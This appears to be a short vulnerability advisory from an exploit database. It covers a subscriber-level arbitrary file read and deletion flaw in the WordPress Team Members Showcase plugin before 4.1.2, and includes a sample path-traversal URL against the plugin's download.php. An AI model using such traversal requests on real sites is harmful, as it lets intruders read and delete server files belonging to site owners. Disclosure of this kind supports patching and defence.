Lucene search

K
wpexploitNhatnamWPEX-ID:C043916A-92C9-4D02-8CCA-1A90E5382B7E
HistoryJul 27, 2022 - 12:00 a.m.

WordPress Team Members Showcase < 4.1.2 - Subscriber+ Arbitrary File Read and Deletion

2022-07-2700:00:00
nhatnam
81
wordpress
team members showcase
4.1.2
subscriber
arbitrary file read
deletion
exploit

EPSS

0.001

Percentile

35.6%

The plugin contains a file which could allow any authenticated users to download arbitrary files from the server via a path traversal vector. Furthermore, the file will also be deleted after its content is returned to the user

https://example.com/wp-content/plugins/tlp-team/resources/download.php?file=../../../../test.txt

EPSS

0.001

Percentile

35.6%

Related for WPEX-ID:C043916A-92C9-4D02-8CCA-1A90E5382B7E